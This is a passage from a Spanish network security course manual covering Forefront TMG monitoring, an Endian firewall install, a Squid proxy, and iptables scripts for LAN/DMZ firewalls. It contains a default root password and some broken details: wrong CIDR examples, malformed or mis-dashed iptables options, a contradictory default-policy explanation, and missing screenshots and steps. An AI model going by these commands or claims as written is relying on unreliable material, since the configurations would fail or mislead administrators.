2. Administre la supervisión de sesiones de la siguiente manera:
a. Para detener la supervisión de todas las sesiones, haga clic en

Detener sesiones de supervisión en la ficha Tareas. Cuando se
detienen las sesiones de supervisión, el Forefront TMG pierde toda
la información relativa a las sesiones que se hayan supervisado.
b. Para reiniciar la supervisión de todas las sesiones, haga clic en
Detener sesiones de supervisión en la ficha Tareas. Al reiniciar la
supervisión, Forefront TMG empieza a recopilar información sobre
las sesiones activas.
c. Para pausar la supervisión de todas las sesiones, haga clic en
Pausar sesiones de supervisión en la ficha Tareas. Las sesiones
mostradas no se quitan, pero tampoco se agregan las nuevas.
d. Para reanudar la supervisión de todas las sesiones, haga clic en
Reanudar sesiones de supervisión en la ficha Tareas.
Configurar filtros de las sesiones
Puede filtrar la información de las sesiones y luego guardar la consulta resultante
para utilizarla luego.
Para crear un filtro de este tipo, se realiza el siguiente procedimiento:

en el nodo Supervisión, luego haga clic en la ficha Sesiones.

2. En la ficha Tareas, haga clic en Modificar filtro.
3. En el cuadro de diálogo Modificar filtro, especifique un criterio, una
condición y un valor para el filtro.
4. Para guardar el filtro de sesión, haga clic en Guardar filtro.
5. Para cargar un filtro existente, haga clic en Cargar filtro.
6. Haga clic en Iniciar consulta.
Configurando reportes o informes.

Para crear un informe, se realiza el siguiente procedimiento:
1. En la consola de Forefront TMG Management, ubíquese en el árbol y

haga clic en el nodo Registros e informes.
2. En el panel de detalles, haga clic en la ficha Creación de informes.
3. En el panel Tareas, haga clic en el tipo de informe que desea crear.
4. Escriba un nombre para el informe. El informe que crea se guardará en el
panel de detalles de la ficha Creación de informes, donde puede editar
sus propiedades e iniciar manualmente un informe.
5. Haga lo siguiente en función del tipo de informe:
a. Informe de una sola ejecución: en la página Período del informe,
especifique el número de días que desea incluir en el informe. El
número máximo de días es 60.
b. Trabajo de informe periódico: en la página Programación de
trabajos de informes periódicos, especifique cuándo se ejecutará
el trabajo y con qué frecuencia.
c. Informe de actividad de usuario: en la página Detalles del informe,
seleccione el período de informe en la lista y escriba los nombres
de usuario o las direcciones IP que desea incluir en el informe.
d. Informe de actividad de sitio: en la página Detalles del informe,
seleccione el período de informe en la lista, escriba el número de
usuarios que desea incluir y el número de sitios que desea incluir
para cada usuario y, a continuación, escriba el sufijo del nombre
del sitio que desea incluir en el informe, sin incluir comodines. Por
ejemplo, para crear un informe en todos los sitios del dominio
senati.edu.pe, escriba el nombre del sitio, senati.edu.pe.
6. Si desea modificar los parámetros predeterminados del informe, realice lo

siguiente:
a. En la página Contenido del informe, haga clic en la categoría de

informe que desea modificar y, a continuación, haga clic en Editar

detalles del informe.
b. Seleccione una subcategoría de informe en la lista Subcategoría y,
a continuación, haga clic en Valor de parámetro y ajuste el valor
según sea necesario.
c. En algunas subcategorías de informe es posible modificar el orden
en el que se muestran los datos. Para ello, en Ordenar por,
seleccione el valor de parámetro que se va a usar para ordenar los
datos del informe.
7. Si se desea enviar el informe por correo electrónico, habilite Enviar

notificación por correo electrónico cuando finalice un informe y configure
la manera en la que desea enviar dichas notificaciones.
8. Si desea poder ver este informe sin abrir la Forefront TMG Management
console, configure Forefront TMG para publicar informes en la página
Publicación de informes.
9. Complete el asistente y, a continuación, haga clic en Finalizar. En la barra
Aplicar cambios, haga clic en Aplicar.
Supervisando la conectividad.
Al crear una granja de servidores, deberá especificar el método de conexión que
desee utilizar para comprobar el estado de conectividad de los servidores de la
granja. Tras crear una granja de servidores, se creará automáticamente para esa
granja un comprobador de conectividad que aparecerá en la ficha
Comprobadores de conectividad. Puede editar el método de conexión en las
propiedades de la granja de servidores.
Para crear un comprobador de conectividad, debe realizar los pasos siguientes:

el nodo Supervisión. A continuación, haga clic en la ficha Comprobadores
de conectividad.
2. Finalice el Asistente para nuevo comprobador de conectividad. En la
página Detalles de comprobación de conectividad, especifique el servidor
o la dirección URL con los que se desee conectar y el método de
conexión. Puede usar los siguientes métodos:
a. PING: Forefront TMG envía una solicitud PING (ECHO_REQUEST
de ICMP) al servidor especificado y espera una respuesta
ECHO_REPLY de ICMP. Utilice este método para comprobar si un
servidor concreto está disponible.
b. Conexión TCP: Forefront TMG intenta establecer una conexión

TCP con un puerto concreto del servidor especificado. Utilice este

método para comprobar si un servicio específico está disponible en
el servidor de destino.
c. Solicitud HTTP: Forefront TMG envía una solicitud HTTP GET y
espera una respuesta. Utilice este método para comprobar si un
servidor web está disponible.
Para configurar comprobadores de conectividad, realice las tareas siguientes:

el nodo Supervisión. A continuación, haga clic en la ficha Comprobadores
de conectividad.
2. En la ficha Comprobadores de conectividad, haga clic en el comprobador
de conectividad que desee modificar y seleccione Editar comprobador
seleccionado en la ficha Tareas.
3. En la ficha General, modifique el nombre del comprobador de conectividad
si ello es necesario.
4. En la ficha Propiedades, haga lo siguiente:
a. En Supervisar la conexión a este servidor, modifique el nombre del
servidor de destino.
b. En Seleccionar el método usado para comprobar la conexión,
modifique el método de conexión.
c. En Tiempo de espera, especifique cuánto tiempo debe esperar
Forefront TMG antes de notificar que el servidor no está disponible.
d. Para especificar que una alerta se desencadene al superar el
tiempo de espera, haga clic en Desencadenar una alerta si la
respuesta del servidor no se recibe dentro del tiempo de espera
especificado.
Supervisando Servicios y Rendimiento.
Utilizando el monitor de rendimiento:
Para utilizar esta útil herramienta, realice los pasos siguientes:
1. Haga clic en Inicio, Microsoft Forefront TMG y a continuación, en el Monitor

de rendimiento de Forefront TMG.
2. En el Monitor de confiabilidad y rendimiento, aparecerá una serie de
contadores predeterminados, como por ejemplo:
a. Motor de paquete firewall de Forefront TMG: Permite visualizar el
número total de conexiones activas que transmiten datos en este
momento. Utilice este contador para supervisar el rendimiento
general.

b. Motor de paquete firewall de Forefront TMG: Permite monitorear la

transferencia total en bytes por segundo que pasan por el firewall.
Cada byte se cuenta dos veces: una cuando entra en el firewall y
otra cuando sale de él.
c. Servicio de firewall de Forefront TMG: Permite monitorear el
número de sesiones activas del servicio de firewall. Si se compara
este contador en horas de mayor tráfico y fuera de estas horas, se
obtendrá una buena indicación del uso de la red.
d. Proxy web de Forefront TMG: Monitorea La frecuencia de
solicitudes por segundo. Utilice este contador para supervisar el
rendimiento general. Al dividir el contador Bytes enviados a
cliente/s por este contador, se obtiene una medida de la respuesta
media que no debería ser superior a 20 KB, aproximadamente.
e. Motor de paquete firewall de Forefront TMG: Permite monitorear el
número de paquetes denegados por segundo. Utilícelo para
supervisar amenazas de seguridad en general. Si los números son
altos (más de 100), compruebe si hay ataques o errores de
configuración de red.
f. Motor de paquete firewall de Forefront TMG: Permite monitorear el
número de paquetes permitidos y denegados por segundo.
Utilícelo para supervisar las amenazas de seguridad y el
rendimiento general.
g. Motor de paquete firewall de Forefront TMG: Permite monitorear el
número de conexiones TCP y UDP creadas por segundo. Utilícelo
para supervisar las amenazas de seguridad y el rendimiento
general.
h. Proxy web de Forefront TMG: Permite monitorear el tiempo medio
de respuesta. Utilícelo para supervisar las amenazas de seguridad
y el rendimiento general. Use recuperaciones directas y
recuperaciones de caché para efectuar el diagnóstico.

1. ¿Qué tan importante es contar con reportes diarios sobre la navegación
WEB en la empresa?.
2. ¿Qué parámetros deberían tomarse en consideración en un reporte e
informe en un servidor Proxy/firewall?.
3. A partir de estos informes, ¿Qué tipos de conclusiones y decisiones se
pueden tomar?.


TAREA
10
Tarea 10: Realizar la protección de la red de la empresa utilizando un
servidor de seguridad con Linux.
En esta tarea realizará los siguientes puntos:
Diferentes escenarios para brindar la seguridad de la red de

datos de la empresa utilizando un servidor Linux.
Configurando una Red Perimetral con Linux.
Configurando un servidor proxy en Linux.
“Él éxito no tiene que ver con la cantidad que tenemos,

sino con la persona que somos”.
Jim Rohn

capacidad.
 Diferentes programas de antivirus.
 Diferentes escenarios para brindar la seguridad de la red de datos de la

empresa utilizando un servidor Linux.
 Configurando una Red Perimetral con Linux.
 Configurando un servidor proxy en Linux.
TAREA PRÁCTICA:
Para realizar esta tarea, debe realizar los siguientes pasos:
La topología a realizar, es la siguiente:
1. Descargamos el archivo iso: EFW-COMMUNITY-2.4-201005280528-

RESPIN.
2. Creará la maquina virtual en Virtual Box (el instructor puede utilizar un
software de virtualización diferente)
3. Agregará tres adapradores de red, de los cuales verifique sus respectivas
direcciones MAC:

4. Realizamos el proceso de instalación y configuración básica (indicado en

la sección anterior)
5. Las interfaces agregadas en el tercer paso serán para la red Interna, para
la red externa y para la red DMZ.
6. Ingresamos a la configuración, via WEB y empezaremos a configurar las
diversas redes:
a. Red Roja: Red Wan (internet).
b. Red naranja: Red DMZ.
c. Red azul: Red inalámbrica.
d. Red verde: red lan o interna.

RED ROJA: Red

externa, red WAN o
Internet..
7. Utilizaremos en esta ocasión, la red roja, naranja y verde.
RED NARANJA: Red

DMZ.
8. Asignamos las direcciones IP según lo indicado en la topología.

Debe escoger
correctamente las
Interfaces de red.
9. Ingresará las direcciones IP de los servidores DNS.

10. Realizará la configuración de la cuenta de correo del administrador, lo cual

es opcional:
11. Se finalizará la configuración:

12. Ingresará a la pantalla principal para ver el trafico:
13. Agregará la maquina cliente y le colocará un IP perteneciente a la red

Interna y debería navegar en Internet:
Se realizará la
configuración
del equipo
Cliente.

14. Para crear las reglas NAT, ingresará al menú “cortafuegos” y luego a la
ficha: “NAT fuente”:
15. Hará clic en “Agregar una nueva regla de NAT fuente”.

16. Creará dos reglas, una para la red LAN hacia Internet y la otra será para
la red DMZ hacia Internet.
17. Ahora publicaremos los servicios de la DMZ, para eso se contará con un
servidor WEB en al red DMZ, con el IP: 192.168.5.2/24.

18. En el firewall, ingresará al menú “Cortafuegos” y luego se ubicará en “Port

Forwarding/ Destiantion NAT” y adicionará una nueva regla:
19. Especificará el IP del servidor WEB y el servicio a publicar:
20. Para verificar el funcionamiento, desde una PC en la red externa,

navegará en: http://192.168.1.10

21. Ahora debe configurar las reglas de acceso para permitir y denegar trafico:
22. Ingrese al menú “Cortafuegos” y luego debe hacer clic en “trafico de
salida”:
23. Haga clic en “Agregar una nueva regla del cortafuegos” y en origen,
colocará la red Verde y en destino colocará los ips de las redes de un
determinado dominio.
24. Luego, en acción escogerá “Denegar” y en posición colocará “Primero”:
25. Como se debe hacer al crear cualquier regla en el firewall, aplique los
cambios:

FUNDAMENTO TEÓRICO:
Diferentes escenarios para brindar la seguridad de la red de datos de la
empresa utilizando un servidor Linux.
Anand Sastry, un importante especialista en Seguridad de la Información, nos
indica:
Cada implementación en la empresa tiene un firewall como la primera línea de
defensa, protegiendo los activos contra las amenazas comunes del Internet.
El firewall actúa normalmente limitando el acceso únicamente a los servicios de
Internet que la empresa considere necesarios. Bajo este esquema, el acceso es
controlado por determinadas reglas.
Por lo general, las empresas utilizan una estructura que separa los servidores
de acceso Internet de los activos corporativos de la empresa en un particular
segmento de red aislado conocido como una "zona desmilitarizada" (DMZ). El
aislamiento se logra dedicando una interfaz de red del firewall para estos
servidores que son publicados.
El acceso directo a activos no alojados en la DMZ no está permitido. Estos
activos incluyen típicamente estaciones de trabajo de la empresa, componentes
críticos del servidor, tales como controladores de dominio, servidores de correo
electrónico y aplicaciones empresariales importantes. Los activos alojados en el
segmento DMZ normalmente incluyen aplicaciones con acceso a Internet, tales
como interfaces de web, servidores, servidores relés de correo electrónico,
servicios públicos de alojamiento de archivos, etc.
Para entornos de alto tráfico, un equilibrador de carga maneja todas las
conexiones desde la interfaz de Internet del firewall, dirigiendo el tráfico al
servidor web con la menor carga. Los servidores de aplicaciones y bases de
datos están alojados en segmentos separados con reglas de acceso que
restringen el acceso entre los niveles de web, de aplicaciones y de bases de
datos.
En todos los casos, el firewall actúa como el primer mecanismo de defensa,
controlando qué activos pueden ser accedidos, a la vez que proporciona
protección contra ataques en la capa de red del modelo OSI, pero el firewall en
esta forma de trabajo ya no es una protección adecuada contra las más

poderosas formas de ataque que se están dando en la actualidad, que consisten

en aprovechar las debilidades de las aplicaciones utilizadas en la empresa (capa
7 del modelo de referencia OSI) en lugar de debilidades en el ámbito de la red
(capa 3 del modelo OSI).
Para hacer frente a estas amenazas actuales, los firewall han sido ampliados
con productos que se encargan de evitar los ataques en las aplicaciones y
amenazas de software malicioso.
Algunos tipos de escenarios actuales de implementación de firewalls que han
sido diseñados para frustrar malware y ataques a las aplicaciones son:
Firewalls para la vigilancia del tráfico saliente:
En los diversos entornos empresariales donde los firewalls están diseñados para
controlar acceso entrante y saliente, el acceso web saliente es permitido
normalmente sin oposición lo cual expone a la empresa al ingreso de software
malicioso.
De forma predeterminada, los Firewalls permiten todo el tráfico de red saliente.
De forma predeterminada, el tráfico de red entrante en un equipo que no cumpla
una regla se bloquea, pero nada impide que el tráfico saliente salga de un equipo.
Para bloquear el tráfico de red para programas prohibidos, debe crear una regla
de salida que impida que el tráfico con criterios específicos pase a través del
Firewall.
Para contrarrestar esta amenaza, los productos de firewalls más tradicionales
han sido ampliados con funciones de gestión de acceso a Internet (en línea o
basados en proxy) que controlan específicamente el acceso saliente.
Inspección del contenido de la capa de aplicación
Los proveedores de firewall en la actualidad están ofreciendo herramientas que
realizan una inspección del contenido de la capa de aplicación combinado con
los antivirus. Estos dispositivos, además de supervisar el tráfico buscando
contenido malicioso, también bloquean el acceso a los sitios que alojan
contenido cuestionable.
Firewalls para aplicaciones web
El monitoreo de la capa 7 o de Aplicación del modelo OSI, podría tomar la forma
de un firewall para aplicaciones de web, que se centran específicamente en los
ataques de nivel de aplicación dirigidos a servicios web y aplicaciones.
Además de protegerse contra los ataques de web comunes, como “inyección
SQL”, estos dispositivos tienen la capacidad de comprender el comportamiento

de los clientes (es decir, los usuarios que interactúan con el sitio WEB) y puede
rastrear y prevenir el comportamiento que se desvía de la norma.
Implementaciones de firewalls virtuales
Esta implementación puede ser aumentada aún más con una combinación de
firewalls para aplicaciones web y otras más. En las implementaciones de este
tipo, el firewall convencional todavía tiene un papel que jugar, aunque a un nivel
más amplio, aplicando la separación/protección entre granjas de servidores
virtuales.

En esta ocasión se utilizará ENDIAN, pero el instructor puede escoger otra
distribución de Linux.
Endian es una distribución OpenSource de linux, que fue desarrollada para
actuar como cortafuego (firewall), pero también tiene otros servicios muy
interesantes siendo en su completa magnitud, una gran solución integral que
protege su red.
Entre los servicios que ofrece este producto, tenemos:
 Reglas firewall de entrada y salida

 Ipsec LAN to LAN VPN
 NAT
 Múltiples aliases en la interface WAN
 Soporte para los más conocidos dns dinámicos (dyndns.org)
 Soporte para DMZ
 Interface de administración web bajo https.

 Gráficos detallados de las interfaces de red

 Detalle de todas las conexiones activas
 Log detallado de todos los procesos del sistema
 Envío del log a un syslog
 Servidor NTP
 Servidor DHCP
 Traffic Shaping / QoS
 Proxy POP3 antivirus
 Clamav antivirus
 Proxy SMTP antispam
 Web proxy (Squid) con integración en LDAP o Windows users
 IDS en interface WAN y LAN
 Proxy SIP
 SMTP proxy
 Filtro de contenidos
 SquidGuardian
 Advanced Proxy.
Vamos a instalar Endian en un servidor que se encuentre entre nuestra red local
e Internet y teniendo en cuenta que Endian también viene como un UTM, nos
aportará un nivel importante de seguridad.
Podemos implementar diferentes topologías para seguridad:

Para que podamos descargarlo, ingresamos al portal de: Endian Firewall

Community.
Descargamos el ISO del sistema.
En esta oportunidad se descargó: EFW-COMMUNITY-2.4. .
Iniciamos la descarga:
Una vez descargado, explicaremos el procedimiento de instalación y

configuración básica de Endian:
1. Crearemos una máquina virtual, en este caso se puede utilizar cualquier
software de virtualización, entre los cuales podemos citar:
a. Virtual box.
b. VMware.

c. HyperV, etc.
2. En este caso se mostrará el procedimiento en una máquina virtual creada
en “Virtual Box”.
3. Utilizaremos una máquina para Linux:
4. Definirá la cantidad de memoria RAM para el equipo.

5. Creará un disco duro.
6. Asignará la capacidad del disco duro.
7. Vinculará la imagen iso de Endian a la máquina virtual:
Colocará el ISO de
ENDIAN en el DVD
virtual de la Máquina
virtual.
8. Agregaremos 2 tarjetas de red:

9. Al cargar el instalador se mostrará la siguiente información, presione

“Enter”:
10. Escogerá el idioma para la instalación, en este caso se escogerá el idioma

“Ingles”:
Escogerá el idioma
para la Instalación.
11. Se mostrará un mensaje de bienvenida:

12. El instalador nos indicará que se borrara toda la data del disco,
escogemos “YES” y luego “OK”:
13. La siguiente pantalla nos indica si desearíamos habilitar la conexión por

consola, en este caso no se podría aplicar ya que no se cuenta con el
Hardware necesario:

En este caso indicará

que no.
14. Ahora se iniciará la instalación del software:

15. Ahora asignaremos el IP para la red Interna, denominada: RED GREEN:
Indicará el IP de la
puerta de enlace para
la red GREEN.
16. Luego aparecerá una ventana felicitándonos por haber terminado el

proceso de instalación:
17. Se reiniciará y se mostrará la siguiente ventana:

18. Desde esta interfaz se pueden cambiar las contraseñas, recuerde que la
contraseña por defecto de root es: endian.
19. Ingresamos desde un navegador a la ruta indicada:
https://192.168.1.101:10443 y terminaremos con la configuración básica.
20. Al ingresar desde el navegador visualizaremos la siguiente ventana:
21. Debe configurar el idioma y la zona horaria:
22. Ahora se visualizarán los términos de licencia de uso del software.

Acepte los términos:
Esta es la ventana de
bienvenida a la configuración
via WEB de ENDIAN.

23. Se nos consultará si deseamos restaurar un respaldo, en este caso no

será necesario y hacemos clic en “>>>”.
24. Debe configurar las contraseñas de acceso:
Desde aquí se podrán

cambiar las
contraseñas de
acceso.
25. Se activará un asistente donde se nos solicitará la configuración de la red

ROJA, para la conexión a Internet.
En esta oportunidad escogerá la opción “Ethernet por DHCP” ya que el
proveedor de Internet entrega la configuración IP de esta forma, pero eso
puede variar, consulte a su instructor:
Se definirá la forma de
conexión a Internet
(RED ROJA)

26. Ahora, dependiendo de la topología a realizar, podremos agregar una red

DMZ y WIFI.
En este caso agregaremos una red DMZ:
Se definirá la forma de
conexión a Ia DMZ
(RED NARANJA)
27. Se mostrará una ventana en la cual podrá agregar el IP para el acceso a

la red DMZ en la cual se encontrarán los servidores publicados:
Se deben seleccionar
las interfaces
correctas.

Se debe seleccionar la
interface correcta para
la red Naranja.
28. Finalmente se realizarán las configuraciones para la red ROJA que será
la que se conecta directamente a Internet:
la red Roja.

29. Ahora nos solicitará la configuración DNS, que en este caso es obtenida
en forma dinámica:
30. En el caso en que se encuentre con un servicio de correo electrónico, se

puede ingresar la configuración requerida:
31. Luego se mostrará una ventana indicando que se terminó con la

configuración inicial.
Aplique la configuración:
32. Se confirmará la aplicación de esta configuración.

33. Se solicitarán las credenciales de acceso.
34. Se mostrará la interface de configuración:

Se puede
apreciar el
tráfico en la
red.
35. Si desea agregar una red más, por ejemplo para acceso inalámbrico (RED
AZUL) puede dirigirse al menú “Configuración de red”:
36. Asignará el IP de acceso para la red Inalámbrica:

la red Azul.
37. Finalmente se aplica y guardan los cambios.

Configurando un servidor proxy en Linux.
Un proxy es un ordenador intermedio que se usa en la comunicación de otros
equipos. Mediante un proxy, la información va, primero, al ordenador intermedio
(equipo proxy), y éste se lo envía al ordenador de destino, de tal forma que no
existe una conexión directa entre el origen y el destino.

Para instalar y configurar un servidor Proxy sobre Linux, se puede utilizar squid,
para lo cual realizaremos el siguiente procedimiento:
1. El procedimiento puede ser ligeramente diferente, dependiendo de la
distribución de Linux a utilizar.
2. En este caso se utilizará UBUNTU Server, pero puede ser otra distribución
que indique su instructor.
3. Primero instalaremos el paquete, colocando el siguiente comando:
# apt-get -y update && apt-get -y install squid
4. Una vez instalado, nos vamos al directorio /etc/squid para verificar que
todo se instaló correctamente y realizar algunas configuraciones:
cd /etc/squid.
5. Guardamos el archivo de configuración squid.conf para el caso en que se
requiera retornarlo como estaba inicialmente.
mv squid.conf squid.conf.back
6. Ahora editamos el archivo, utilizando un editor conveniente, en este caso
será “Nano”.
nano squid.conf.
7. En este archivo podrá configurar diversas opciones, como por ejemplo:
# Indicará el puerto que será utilizado para el proxy:
http_port 8080
# Indicará la capacidad de la memoria cache del proxy:
Cache_mem 100 MB
# Indicará la dirección del directorio del spool
Cache_dir ufs /var/spool/squid 150 16 256
# se declara el IP de la red Lan:
Acl red_local src 172.31.2.0/23
# Declare el Ip del localhost
Acl localhost src 127.0.0.1/32
# Ahora damos el acceso al localhost y a la red LAN
http_access allow localhost
http_access allow red_local
Luego guardamos los cambios en el archivo de configuración y
reiniciamos el servicio:
Service squid restart

También podemos utilizar el proxy que viene instalado en el UTM Endian, para
lo cual se ubicará en el menú “PROXY” y seleccionará la opción: “HTTP” y
habilitará la aplicación:
Desde aquí debemos indicar si el proxy HTTP debe ser: transparente y no

transparente.
OBSERVACION:
Proxy No Transparente: En este caso necesitas especificar en cada equipo
cliente la dirección IP del servidor proxy y el puerto para su uso.
Proxy transparente: En este caso, su uso es transparente para el usuario, no
necesitas agregar los datos del servidor proxy en los equipos clientes.

1. ¿Cuáles son las ventajas y desventajas de utilizar un sistema Linux para

proporcionar seguridad a la red de datos de la empresa?.
2. ¿Cuáles son las características más importantes de Endian y qué otros
firewall similares existen en Linux?.
3. En ENDIAN se puede trabajar con proxy transparente y no transparente.-
Explique.

TAREA
11
Tarea 11: Implementar la seguridad utilizando Iptables.
Entender el concepto e importancia de las Iptables

Creando un firewall con Iptables.
Firewall de una LAN con salida a Internet.
Firewall de una LAN con salida a Internet con DMZ.
Firewall con política por defecto DROP.
Como depurar el funcionamiento del Firewall.
"El hombre inteligente no es el que tiene muchas ideas, sino el que sabe
sacar provecho de las pocas que tiene." Anónimo

capacidad.
 Entender el concepto e importancia de las Iptables

 Creando un firewall con Iptables.
 Firewall de una LAN con salida a Internet.
 Firewall de una LAN con salida a Internet con DMZ.
 Firewall con política por defecto DROP.

 Como depurar el funcionamiento del Firewall.
TAREA PRÁCTICA:
Creando un firewall con Iptables con salida hacia Internet y con red DMZ:
Instalará un servidor Linux como Firewall, teniendo en cuenta la siguiente
topología:
1. Para este ejercicio, trabajaremos con una maquina virtual creada con
Centos, que debe dispober de tres tarjetas de red, cada tarjeta tendrá la
configuración Ip correspondiente:
2. Una vez instalado el servidor, se procede a realizar la configuración de las

direcciones IP para cada interface:

Se deben configurar
las tres conexiones de
red.
 Eth0: (WAN)
IP: 192.168.1.2
Mascara: 255.255.255.0
PE: 192.168.1.1
DNS:
200.48.225.130.
200.48.225.146.
 Eth1: (LAN)
IP: 192.168.20.1
Mascara: 255.255.255.0
PE:
DNS:
200.48.225.130.
200.48.225.146.

 Eth2: (DMZ)
IP: 192.168.3.1
Mascara: 255.255.255.0
PE:
DNS:
200.48.225.130.
200.48.225.146.
3. Empezará colocando los siguientes comandos por medio de un terminal:

## Eliminando las reglas anteriores si existiesen
iptables −F
iptables −X
iptables −Z

iptables −t nat −F
## Establecemos la politica por defecto para el firewall
iptables −P INPUT ACCEPT
iptables −P OUTPUT ACCEPT
iptables −P FORWARD ACCEPT
iptables −t nat −P PREROUTING ACCEPT
iptables −t nat −P POSTROUTING ACCEPT
## Ahora, se iniciará el filtrado, recordemos que eth0 es el interfaz
## conectada al router y eth1 al switch de la LAN
# Todo lo que venga desde la WAN o red externa y vaya al puerto 80 lo
# redirigimos al servidor WEB de la DMZ
iptables −t nat −A PREROUTING −i eth0 −p tcp −−dport 80 −j DNAT −−to
192.168.3.2:80
# Los accesos de un ip vía HTTPS se redirigen al servidor WEB via el
#puerto 443:
iptables −t nat −A PREROUTING −i eth0 −p tcp −−dport 443 −j DNAT −−to
192.168.3.2:443
# Al host local (localhost), se le deja las conexiones (por # ejemplo
# conexiones locales a un gestor de bases de datos)
/sbin/iptables −A INPUT −i lo −j ACCEPT
# Podemos acceder al firewall desde la red local
iptables −A INPUT −s 192.168.20.0/24 −i eth1 −j ACCEPT
# La red local y de la DMZ deben poder salir hacia la externa
iptables −t nat −A POSTROUTING −s 192.168.20.0/24 −o eth0 −j
MASQUERADE
iptables −t nat −A POSTROUTING −s 192.168.3.0/24 −o eth0 −j
MASQUERADE
# Debemos permitir un forward de paquetes en el firewall, es decir
# que otras máquinas puedan salir a traves de este firewall.
## Si deseas que el servidor trabaje como puerta de acceso a internet
### compartida, pues deberás activar el "IP forwarding" en tu computador
### que actuará como ruteador.
echo 1 > /proc/sys/net/ipv4/ip_forward

## Permitimos el acceso de la red DMZ a un servidor de BD de la LAN,

# ya que el servidor WEB de la DMZ muestra información de la BD :
iptables −A FORWARD −s 192.168.3.2 −d 192.168.20.5 −p tcp −−dport
5432 −j ACCEPT
iptables −A FORWARD −s 192.168.20.5 −d 192.168.3.2 −p tcp −−sport
5432 −j ACCEPT
## Ahora, debemos permitir abrir el Terminal server de la DMZ desde la
# red LAN
iptables −A FORWARD −s 192.168.20.0/24 −d 192.168.3.2 −p tcp −−sport
1024:65535 −−dport 3389 −j ACCEPT
iptables −A FORWARD −s 192.168.3.2 −d 192.168.20.0/24 −p tcp −−sport
3389 −−dport 1024:65535 −j ACCEPT
# Por razones de seguridad, cerramos el acceso de la DMZ a la LAN
iptables −A FORWARD −s 192.168.3.0/24 −d 192.168.20.0/24 −j DROP
## Ahora cerramos el acceso de la DMZ al propio firewall
iptables −A INPUT −s 192.168.3.0/24 −i eth2 −j DROP
## y lo mas importante, cerramos los accesos indeseados del exterior:
# recordemos que la red 0.0.0.0/0 significa: cualquier red
# Cerramos el rango de los puertos bien conocidos
iptables −A INPUT −s 0.0.0.0/0 −p tcp −dport 1:1024 −j DROP
iptables −A INPUT −s 0.0.0.0/0 −p udp −dport 1:1024 −j DROP
FUNDAMENTO TEORICO:
Entender el concepto e importancia de las Iptables
El firewall utilizado para gestionar las conexiones en Linux es iptables.
IPtables es un sistema de firewall vinculado al kernel de linux que se ha
extendido enormemente a partir del kernel 2.4 de este sistema operativo. Al igual
que el anterior sistema ipchains, un firewall de iptables no es como un servidor
que lo iniciamos o detenemos o que se pueda caer por un error de programación,
iptables está integrado con el kernel, es parte del sistema operativo. Con las
iptables, se aplican reglas diversas.
Las iptables permiten configuraciones muy diversas y un administrador puede
realizar configuraciones para casos de gran complejidad. Las iptables permiten
crear reglas que analizarán los paquetes de datos que entran y salen del

computador, con el objetivo, que bajo determinadas condiciones, se permita o

deniegue que dicho paquete siga su curso.
Creando un firewall con Iptables.

Para crear las reglas, podemos analizar muchos aspectos de los paquetes de
datos.
Se pueden filtrar paquetes en función de:
1. Tipo de paquete de datos:
a. Tipo INPUT: paquetes que llegan a nuestra máquina.
b. Tipo OUTPUT: paquetes que salen de nuestra máquina.
c. Tipo FORWARD: paquetes que pasan por nuestra máquina.
2. Interfaz por la que entran (-i = input) o salen (-o = output) los paquetes en
el servidor:
Ejemplos: eth0, eth1, eth2, wlan1, ppp0, ...
3. Indicando la dirección IP del origen de los paquetes (-s = source)
a. Dirección IP de un host de forma específica, ej: 10.0.1.3
b. Rango de la red origen, ej: 10.0.1.0/8
4. Indicando la dirección IP destino de los paquetes (-d = destination)
a. Dirección IP de un host de forma específica, ej: 10.0.1.10
b. Rango de la red Destino, ej: 10.0.1.0/8
5. Protocolo a utilizar (-p = protocol)
Ejemplos de protocolos: Tcp, udp, icmp...

6. Hacer NAT (modificar IP origen y destino para conectar nuestra red a otra
red o a Internet). Estas reglas NAT se generan tomando en cuenta dos
opciones:
a. Filtrar antes de enrutar: PREROUTING
b. Filtrar después de enrutar: POSTROUTING
Una forma sencilla de trabajar con iptables es permitir las comunicaciones que
nos interesen y luego denegar el resto de las comunicaciones, esto es
denominado: Política por defecto ACEPTAR
Ejemplos:
1. Éste script permite que se pueda acceder al servicio WEB ofrecido en este
servidor, el acceso al servidor desde el equipo con IP: 192.168.200.5 vía
SSH y el acceso a la administración de la BD:
OBSERVACION:
Puerto 22: El puerto 22 es utilizado por defecto por SSH, el cual es sin
lugar a dudas, de gran importancia para los administradores de redes.
Cuando se necesite controlar y administrar remotamente otros
ordenadores y/o servidores es muy útil el SSH.
Ahora, regresando al ejemplo, ingresaremos el script para la solución:

## Borrado de reglas
## Eliminamos cualquier tipo de definición existente
iptables −F
## Borra las reglas definidas por el usuario
iptables −X
## Coloca los contadores de las reglas a 0

iptables −Z
## Establecemos las políticas por defecto, con esto bastará para que
## nadie, absolutamente nadie pueda entrar a su ordenador,
## incluyéndose usted mismo.
## Con ella regla, indicamos que la política por defecto (-P) para todo lo
## que desee entrar a nuestro ordenador (INPUT) es obviarlo, no hacerle
## caso (DROP)
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
## Para permitir a mi propio equipo ingresar a los puertos y servicios debo
## utilizar la siguiente regla:
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
## De las líneas ingresadas, la primera línea nos dice que el propio
## ordenador (-i lo …, donde lo = localhost) puede hacer de todo.
## La segunda línea se refiere a que todas las conexiones que nosotros
## iniciemos (que salgan desde nuestro ordenador), cuando por esa
## conexión quiera entrar algún dato, iptables dejará que ese dato entre,
## esto es muy fácil de entender en el caso del servicio WEB.
## Se evita el acceso al icmp, por ejemplo, el uso del ping.
iptables -A INPUT -p icmp -j DROP
## Permitir el acceso al servicio WEB tanto por HTTP y HTTPS:
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state
NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 80 -m state --state
ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --dport 443 -m state --state
NEW,ESTABLISHED -j ACCEPT
## Permitir el acceso por SSH desde un equipo con el IP: 192.168.200.5:
iptables -A INPUT -i eth0 -p tcp -s 192.168.200.5 --dport 22 -m state --
state NEW,ESTABLISHED -j ACCEPT


# A un equipo le dejamos entrar al mysql para que administre la BD:
iptables −A INPUT −s 231.45.134.23 −p tcp −−dport 3306 −j ACCEPT
# A un diseñador le dejamos usar el FTP
iptables −A INPUT −s 80.37.45.194 −p tcp −dport 20:21 −j ACCEPT
## Fin del script de ejemplo
Firewall de una LAN con salida a Internet.
Para que las computadoras de la LAN puedan tener salida a Internet, podríamos
agregar el siguiente código:
